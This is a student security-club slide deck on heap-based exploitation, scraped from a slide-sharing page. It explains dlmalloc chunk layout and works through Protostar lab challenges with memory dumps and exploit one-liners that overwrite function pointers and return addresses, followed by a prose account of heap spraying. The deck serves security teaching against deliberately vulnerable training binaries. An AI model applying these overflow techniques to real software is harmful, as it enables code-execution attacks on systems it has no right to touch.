Fuzzing - Part 1
Fuzzing - Part 1Fuzzing - Part 1
Fuzzing - Part 1
 
Return Oriented Programming
Return Oriented ProgrammingReturn Oriented Programming
Return Oriented Programming
 
Advanced Windows Exploitation
Advanced Windows ExploitationAdvanced Windows Exploitation
Advanced Windows Exploitation
 
Advanced Domain Hacking
Advanced Domain HackingAdvanced Domain Hacking
Advanced Domain Hacking
 

Recently uploaded

Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Thierry Lestable
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backElena Simperl
 
IESVE for Early Stage Design and Planning
IESVE for Early Stage Design and PlanningIESVE for Early Stage Design and Planning
IESVE for Early Stage Design and PlanningIES VE
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupCatarinaPereira64715
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Product School
 
"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor TurskyiFwdays
 
IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024IoTAnalytics
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaRTTS
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxDavid Michel
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Alison B. Lowndes
 
Powerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara LaskowskaPowerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara LaskowskaCzechDreamin
 
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo DiehlFuture Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo DiehlPeter Udo Diehl
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesThousandEyes
 
Speed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in MinutesSpeed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in Minutesconfluent
 
UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2DianaGray10
 

Recently uploaded (20)

Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 
IESVE for Early Stage Design and Planning
IESVE for Early Stage Design and PlanningIESVE for Early Stage Design and Planning
IESVE for Early Stage Design and Planning
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi
 
IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
Powerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara LaskowskaPowerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara Laskowska
 
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo DiehlFuture Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
Future Visions: Predictions to Guide and Time Tech Innovation, Peter Udo Diehl
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
Speed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in MinutesSpeed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in Minutes
 
UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2UiPath Test Automation using UiPath Test Suite series, part 2
UiPath Test Automation using UiPath Test Suite series, part 2
 

Heap Base Exploitation

  • 1. Scott Hand CSG 2/22/12 HEAP BASED EXPLOITATION
  • 2.  Heap Basics  Overview of Exercise Environment Protostar  Heap0  Heap1  Heap2  Heap3  Heap Spraying  Conclusion WHAT WE WILL COVER…
  • 4.  We know about the stack. Programs store local variables there.  Heaps are for storing globals as well as variables too large for the stack  In Linux:  .data – Initialized globals  .bss – Uninitialized globals  Heap – Dynamically allocated space, grows upwards  Stack – Local variables, grows down WHAT IS THE HEAP?
  • 5.  glibc uses a version of the popular dlmalloc algorithm  Memory is allocated in chunks. Each chunk is 8-byte aligned with a header and data.  Each chunk contains:  Size information before and after the chunk – Easy to combine chunks and allows bidirection traversal from any chunk. Trailer fields are sometimes omitted in recent implementations  Chunks are stored in a linked list of bins, sorted by size in continuous increments of 8 for sizes under 512. Over 512 can be any multiple of 8.  Upon freeing a chunk, it is combined with freed neighbors to lower fragmentation  The final “top” chunk is empty and its size records the remaining about of free space MEMORY ALLOCATION DATA STRUCTURES
  • 7.  Locality Preservation  Chunks allocated at the same time tend to be referenced similarly and have coexistent lifetimes  Important for good performance, reduces cache misses  A tweaked version of nearest-fit is used that results in consecutive blocks when there is space  This is good for us  Easy to create overflows, as memory allocated after vulnerable variables is often given to other variables nearby that may be for things such as function pointers or file paths SOME CONSEQUENCES
  • 8.  We want to see what the heap looks like as more memory is allocated  We will allocate three strings: a, b, c. Each is 32 bytes.  Code: char *a, *b, *c; a = malloc(32); b = malloc(32); c = malloc(32);  This will serve as an introduction to the heap3 problem MALLOC EXAMPLE
  • 9. FIRST ALLOCATION 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a Remaining Space: 0xFD9
  • 10. SECOND ALLOCATION 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 32 Byte Data Chunk 2 b Remaining Space: 0xFB1
  • 11. THIRD ALLOCATION 0x0804c000 8 Byte Size – 0x29 0x0804c008 32 Byte Data Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 32 Byte Data Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 32 Byte Data Chunk 3 c Remaining Space: 0xF89
  • 12.  Now, the interesting (and exploitable) part involves the free() implementation in dlmalloc  Let’s examine the contents of memory after successive free() commands are executed.  Code: free(c); free(b); free(a); FREE EXAMPLE
  • 13. BEFORE FIRST FREE 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “BBBB0” Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 “CCCC0” Chunk 3 c Remaining Space: 0xF89
  • 14. AFTER FIRST FREE 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “BBBB0” Chunk 2 b 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
  • 15. AFTER SECOND FREE 0x0804c000 8 Byte Size – 0x29 0x0804c008 “AAAA0” Chunk 1 a 0x0804c028 8 Byte Size – 0x29 0x0804c030 “0x0804c050” Chunk 2 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
  • 16. AFTER THIRD FREE 0x0804c000 8 Byte Size – 0x29 0x0804c008 “0x0804c028” Chunk 1 0x0804c028 8 Byte Size – 0x29 0x0804c030 “0x0804c050” Chunk 2 0x0804c050 8 Byte Size – 0x29 0x0804c058 “0” * 32 Chunk 3 Remaining Space: 0xF89
  • 17.  Here’s the chunk structure with important parts bolded: struct malloc_chunk { INTERNAL_SIZE_T prev_size; INTERNAL_SIZE_T size; struct malloc_chunk* fd; struct malloc_chunk* bk; /* Only for large blocks: pointer to next larger size. */ struct malloc_chunk* fd_nextsize; struct malloc_chunk* bk_nextsize; }; LOOKING AT MALLOC.C…
  • 18.  Looks like, for whatever reason, this machine uses singly linked lists rather than doubly linked lists  We only have the size and fd values to modify SOME OBSERVATIONS
  • 19.  3 Virtual Machines with Challenges  Nebula – Basic exploitation for people with no experience  Protostar – Lots of real-world exploits without some of the modern exploit mitigation systems  Fusion – Advanced scenarios and modern protection systems. Good for those who want to learn how to bypass those systems.  We will use Protostar. It has 4 heap-based exploitation challenges EXPLOIT-EXERCISES.COM
  • 20.  Heap0 – Basic heap overflow  Heap1 – More complicated overflow  Heap2 – Stale pointers  Heap3 – Heap metadata manipulation HEAP CHALLENGES
  • 22.  Goal – We want to change the function pointer that points to nowinner() to point to winner() instead  Description from author: This level introduces heap overflows and how they can influence code flow. HEAP0 - OVERVIEW
  • 23.  Relevant Code: struct data *d; struct fp *f; d = malloc(sizeof(struct data)); f = malloc(sizeof(struct fp)); f->fp = nowinner; printf("data is at %p, fp is at %pn", d, f); strcpy(d->name, argv[1]); f->fp(); HEAP0 - CODE
  • 24. 0x804a000: 0x00000000 0x00000049 0x00000000 0x00000000 0x804a010: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a020: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a030: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a040: 0x00000000 0x00000000 0x00000000 0x00000011 0x804a050: 0x08048478 0x00000000 0x00000000 0x00020fa9 0x804a060: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a070: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a080: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a090: 0x00000000 0x00000000 0x00000000 0x00000000 HEAP0 – VALID INPUT BEFORE STRCPY d f nowinner()
  • 25. 0x804a000: 0x00000000 0x00000049 0x41414141 0x00000000 0x804a010: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a020: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a030: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a040: 0x00000000 0x00000000 0x00000000 0x00000011 0x804a050: 0x08048478 0x00000000 0x00000000 0x00020fa9 0x804a060: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a070: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a080: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a090: 0x00000000 0x00000000 0x00000000 0x00000000 HEAP0 – VALID INPUT AFTER STRCPY d f nowinner() “AAAA”
  • 26.  If we overflow the character buffer in d, we can overwrite the function pointer f  The distance from f to d is 0x804a050-0x804a008 = 72  The pointer for winner() is 0x8048464  Python Code: print "A"*72 + "x64x84x04x08" HEAP0 – EXPLOIT CREATION
  • 27. 0x804a000: 0x00000000 0x00000049 0x41414141 0x41414141 0x804a010: 0x41414141 0x41414141 0x41414141 0x41414141 0x804a020: 0x41414141 0x41414141 0x41414141 0x41414141 0x804a030: 0x41414141 0x41414141 0x41414141 0x41414141 0x804a040: 0x41414141 0x41414141 0x41414141 0x41414141 0x804a050: 0x08048464 0x00000000 0x00000000 0x00020fa9 0x804a060: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a070: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a080: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a090: 0x00000000 0x00000000 0x00000000 0x00000000 HEAP0 – INVALID INPUT AFTER STRCPY d f winner()
  • 29.  Goal – Execute the winner() function again. But it’s not so obvious how this will happen.  There are two allocations and two strcpy commands  There are no function pointers. What should we overwrite?  Description from Author: This level takes a look at code flow hijacking in data overwrite cases. HEAP1 - OVERVIEW
  • 30.  Relevant Code struct internet *i1, *i2, *i3; i1 = malloc(sizeof(struct internet)); i1->priority = 1; i1->name = malloc(8); i2 = malloc(sizeof(struct internet)); i2->priority = 2; i2->name = malloc(8); strcpy(i1->name, argv[1]); strcpy(i2->name, argv[2]); HEAP1 –CODE
  • 31.  This instruction is the important one: strcpy(i2->name, argv[2]);  We are moving an argument into a pointer stored at i2->name  Can we change the destination of our argument? HEAP1 – EXPLOIT IDEAS
  • 32. 0x804a000: 0x00000000 0x00000011 0x00000001 0x0804a018 0x804a010: 0x00000000 0x00000011 0x00000000 0x00000000 0x804a020: 0x00000000 0x00000011 0x00000002 0x0804a038 0x804a030: 0x00000000 0x00000011 0x00000000 0x00000000 0x804a040: 0x00000000 0x00020fc1 0x00000000 0x00000000 HEAP1 – VALID INPUT BEFORE STRCPY i1->name i1 i2 i2->name
  • 33. 0x804a000: 0x00000000 0x00000011 0x00000001 0x0804a018 0x804a010: 0x00000000 0x00000011 0x41414141 0x00000000 0x804a020: 0x00000000 0x00000011 0x00000002 0x0804a038 0x804a030: 0x00000000 0x00000011 0x42424242 0x00000000 0x804a040: 0x00000000 0x00020fc1 0x00000000 0x00000000 HEAP1 – VALID INPUT AFTER STRCPY i1->name = “AAAA”i1 i2 i2->name = “BBBB”
  • 34.  Let’s overflow i1->name to overwrite i2->name’s pointer  Where to point?  Return address!  20 characters of padding “A” characters  Return address is stored at 0xbffff79c  Address of winner() is 0x08048494  Python Code for overflow (i1):  print "A"*20 + "x9cxf7xffxbf"  Shell Code for replacement (i2):  printf "x94x84x04x08"  Final exploit:  `python -c 'print "A"*20 + "x9cxf7xffxbf"'` `printf "x94x84x04x08"` HEAP1 – EXPLOIT CREATION
  • 36.  Goal – According to the problem description, this level is completed when you see the "you have logged in already!" message  Description from Author: This level examines what can happen when heap pointers are stale. HEAP2 - OVERVIEW
  • 37.  For each input loop, the following commands are parsed:  auth  Description: Allocates memory for auth pointer, clears it, then copies the user input into it  Code: auth = malloc(sizeof(auth)); memset(auth, 0, sizeof(auth)); if(strlen(line + 5) < 31) { strcpy(auth->name, line + 5); }  service  Description: Changes the service pointer to a duplicate of the provided input  Code: service = strdup(line + 7); HEAP2 – PROGRAM DESCRIPTION
  • 38.  For each input loop, the following commands are parsed:  reset  Description: Frees the auth pointer  Code: free(auth);  login  Description: Simulates a login. If the auth->auth field is nonzero, then the user is logged in. Otherwise, we get a dummy password prompt.  Code: if(auth->auth) { printf("you have logged in already!n"); } else { printf("please enter your passwordn"); } HEAP2 – PROGRAM DESCRIPTION
  • 39.  This program calls malloc() for auth using sizeof(auth)  sizeof(auth) returns 4 because it’s returning the size of the pointer, not the size of the struct  However, calls to auth->auth still access memory well beyond its allocated 4 bytes HEAP2 – VULNERABILITY
  • 40.  Let’s call “auth CSG” to set up our auth pointer  Then call “service” with a bunch of non-zero garbage  Then, auth->auth will overflow auth’s buffer into service’s buffer and read a non-zero integer.  Python Exploit: print "auth CSGnservice " + "A"*16 + "nlogin" HEAP2 – EXPLOIT
  • 41. HEAP2 – EXPLOIT VISUALIZED What the programmer thinks happened: auth size auth->name auth->auth 0x804c000 0x804c008 0x804c028 service size service data 0x804c030 0x804c038 What actually happened: 0x804c000 0x804c008 auth size 0x804c018 0x804c020 service size service data 0x804c028 auth->name auth->auth auth->auth is non-zero
  • 43.  Try this one on your own  We’ll go over the solution next week HEAP3 – OVERVIEW
  • 45.  The memory allocation algorithm’s tendency towards contiguous chunk placement can be used for evil yet again  In browser, PDF, Flash, etc. exploitation in which the user can control memory allocations (usually via scripting languages like JavaScript), payload placement is usually done on the heap  How do we reliably find our payload in the potentially fragmented heap?  Fill up an entire chunk with NOP sled + payload and spray it repeatedly into the heap  Once the allocator fills in the gaps for the heap fragmentation, we get a nice big contiguous landing area HEAP SPRAYING
  • 47.  Links:  http://www.exploit-exercises.com  https://www.corelan.be/index.php/2011/12/31/exploit-writing- tutorial-part-11-heap-spraying-demystified/  Any questions? CONCLUSION